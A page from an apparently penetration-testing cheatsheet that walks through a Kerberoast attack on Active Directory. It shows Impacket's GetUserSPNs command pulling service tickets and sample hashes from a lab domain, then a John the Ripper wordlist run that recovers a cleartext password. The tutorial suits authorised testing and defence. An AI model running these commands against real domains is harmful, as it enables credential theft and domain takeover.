cheatsheet
  • Introduction
  • Internal Pentest
    • Active Directory
      • Reconnaissance
        • Find Domain Name
        • Find Domain Controllers
        • Enumerating Machines
        • Enumerating Services
        • DNS Enumeration
      • Exploitation
        • Exploit Without Account
          • SMB Relay
        • Exploit With Account
          • Kerberoast Attack
      • Post-Exploitation
        • Extracting Credentials
          • Retrieve Windows passwords
          • Retrieve Windows hashes
        • Maintening Access
          • Adding Local Administrator
        • Lateral Movement
          • SMB protocol
Powered by GitBook
On this page
  • Introduction
  • Request SPNs Tickets
  • Crack Tickets
  • References
  1. Internal Pentest
  2. Active Directory
  3. Exploitation
  4. Exploit With Account

Kerberoast Attack

This page deals with compromising Active Directory with Kerberoast attack.

PreviousExploit With AccountNextPost-Exploitation

Last updated 5 years ago

Introduction

For several reasons, it is very common in Active Directory environments to find services launched with domain administrator accounts. A Service Principal Name (SPN) associates a service and the user who launched it.

SPN listing
ServicePrincipalName                Name        MemberOf                                          PasswordLastSet
----------------------------------  ----------  ------------------------------------------------  -------------------
http/win10.sittingduck.info         uberuser    CN=Domain Admins,CN=Users,DC=sittingduck,DC=info  2015-11-10 23:47:21
MSSQLSvc/WIN2K8R2.sittingduck.info  sqladmin01                                                    2016-05-13 19:13:20

Any domain user is allowed to request a ticket for a service and locally crack it to retrieve the cleartext password of the domain administrator who launched the service.

If the attack is successful, the attacker compromise the Active Directory domain.

Request SPNs Tickets

Use 's GetUserSPNs:

root@wpad:~/impacket/examples# ./GetUserSPNs.py -request sittingduck.info/notanadmin
Impacket v0.9.15-dev - Copyright 2002-2016 Core Security Technologies

Password:
ServicePrincipalName                Name        MemberOf                                              PasswordLastSet
----------------------------------  ----------  ----------------------------------------------------  -------------------
http/win10.sittingduck.info         uberuser    CN=Domain Admins,CN=Users,DC=sittingduck,DC=info  2015-11-10 23:47:21
MSSQLSvc/WIN2K8R2.sittingduck.info  sqladmin01                                                        2016-05-13 19:13:20

$krb5tgs$23$*sqladmin01$SITTINGDUCK.INFO$SPN*$6e5307df490c6e3339f613fdc5655785$80ba233b4d24531202f2e354c99e7eda807bde7aeeb48ee4cdb6bf809d78652413699e3cff8b9b78b9ee70e997a538155fc7f72e208d715020d458b8413d4b12b212738833c4694d84937d65cb8ecd0020c00a5d39c07da35a748ea2cb062fca4fa9b282e7046d70ee1cae4cfee7d6f791052e283
$krb5tgs$23$*uberuser$SITTINGDUCK.INFO$SPN*$27c08ed2a8d5394f66e8c13c25c98393$310b787ec5c10b20fcc0acb1406b6a6e2ffddd71de3dc4c70c19e5dfcf262cc88574e61cb3940ebfd574b2bb555f2b05f84d8526e3cf46fc0ca57e03467729757cbf79da9f55cde9dabdda68e80dce6564e9f1b904b0585dbc813b82abf89e973e41c102b664f4c649f85acaf7904a273dddcb9315a66f27334f313190e1caf4f5055b671d250f5912cc1871a1dd4a6126087ddfb98ade8f7dde495ee8ad76583aa5a12eef63a690dd82a15eaaca0d7594f2f1dbc899035d89dd628b291590058cfb3405d1dfe4a383be5704465d9c8972ef8f1cba3541fdfa7dcf5063eaed74051fa18bd73f7b4f7d77

uberuser belongs to Domain Admins group (cf. MemberOf column).

Crack Tickets

root@wpad:~/johntheripper/run# ./john /tmp/johnkirb.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 11 password hashes with 11 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Warning: OpenMP is disabled; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 3.35% (ETA: 23:38:44) 0g/s 69751p/s 767263c/s 767263C/s 129700..123junior
ASDqwe123        ($krb5tgs$unkown)
ASDqwe123        ($krb5tgs$unkown)

It is an efficient way to compromise domain admin password and consequently Active Directory domain.

References

First, install MagnumRipper version of which supports KRB5TGS format. Then crack Tickets to obtain cleartext passwords:

Impacket
John The Ripper
mubix's blog